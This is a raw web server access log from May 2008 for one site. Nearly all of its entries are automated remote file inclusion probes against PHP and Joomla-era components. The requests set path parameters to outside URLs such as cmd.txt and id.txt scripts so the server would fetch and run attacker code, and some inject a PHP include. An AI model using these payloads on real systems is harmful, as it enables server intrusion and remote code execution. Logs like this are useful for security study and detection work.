69.72.215.178 - - [06/May/2008:11:56:03 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:11:56:07 -0700] "GET /admin/index.php?o=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:19 -0700] "GET /logs/old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:20 -0700] "GET /old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:22 -0700] "GET /logs/access_080205.log/old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:22 -0700] "GET /old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:22 -0700] "GET /logs/old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:56:27 -0700] "GET /logs/access_080201.log/old_reports.php?file=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:56:33 -0700] "GET /logs/access_080218.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:11:56:39 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:11:56:40 -0700] "GET /phphtml.php?htmlclass_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:56:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:56:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:11:56:54 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:11:56:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:11:56:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:57:03 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:11:57:06 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:57:08 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:57:09 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:57:09 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:57:10 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:11:57:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:11:57:12 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.8.55 - - [06/May/2008:11:57:12 -0700] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:57:15 -0700] "GET /logs/access_080218.log//components/com_simpleboard/file_upload.php?sbp=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:57:32 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:57:32 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:57:33 -0700] "GET //plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:57:35 -0700] "GET /logs//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:57:39 -0700] "GET /logs/access_080228.log/modules/TotalCalendar/about.php?inc_dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:57:39 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:57:39 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:11:57:39 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [06/May/2008:11:57:40 -0700] "GET /logs/access_080211.log/modules/TotalCalendar/about.php?inc_dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:11:57:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [06/May/2008:11:57:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.26.209.233 - - [06/May/2008:11:57:47 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [06/May/2008:11:57:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [06/May/2008:11:57:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:49 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:49 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:57:53 -0700] "GET /xGB.php?act=admin&do=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:54 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:54 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:11:57:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:57:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:58:05 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:58:05 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:58:18 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:58:18 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:58:19 -0700] "GET /logs/xGB.php?act=admin&do=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:58:21 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:58:32 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:58:33 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:11:58:38 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:11:58:38 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:11:58:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:58:43 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.192.236.140 - - [06/May/2008:11:59:04 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 3.0.04506.648)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:59:05 -0700] "GET //plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:59:08 -0700] "GET /logs//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php?config[root_dir]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:59:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:59:47 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:11:59:57 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.35.179 - - [06/May/2008:12:00:11 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:12:00:18 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:12:00:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:12:00:24 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:12:00:26 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:12:00:27 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:00:33 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:00:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:00:33 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:00:38 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:12:00:39 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:12:01:00 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:12:01:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:12:01:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.812" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:12:01:17 -0700] "GET /logs/access_080216.log/main.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:12:01:17 -0700] "GET /logs/main.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.26.209.233 - - [06/May/2008:12:01:51 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.7.111 - - [06/May/2008:12:01:59 -0700] "GET /index.php?incl=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:12:02:18 -0700] "GET /logs/access_080217.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [06/May/2008:12:02:22 -0700] "GET /logs//coppercop/theme.php?THEME_DIR=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.115.213.123 - - [06/May/2008:12:02:22 -0700] "GET //coppercop/theme.php?THEME_DIR=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:12:02:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:12:02:33 -0700] "GET /logs/index2.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:12:02:34 -0700] "GET /index2.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:02:54 -0700] "GET /logs/?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 46269 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:03:04 -0700] "GET /?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:12 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:12 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:12 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:03:17 -0700] "GET /logs/access_080215.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:03:18 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:03:18 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:18 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:12:03:22 -0700] "GET /index.php?incl=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:12:03:50 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:12:03:52 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:04:14 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.7.111 - - [06/May/2008:12:04:15 -0700] "GET /print.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.254.129.70 - - [06/May/2008:12:04:27 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:04:29 -0700] "GET /logs/access.log//modify.php?dir_module=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:04:29 -0700] "GET //modify.php?dir_module=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:12:04:30 -0700] "GET /logs//modify.php?dir_module=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:12:04:41 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.70.163 - - [06/May/2008:12:04:51 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:12:04:53 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:12:04:54 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:05:05 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
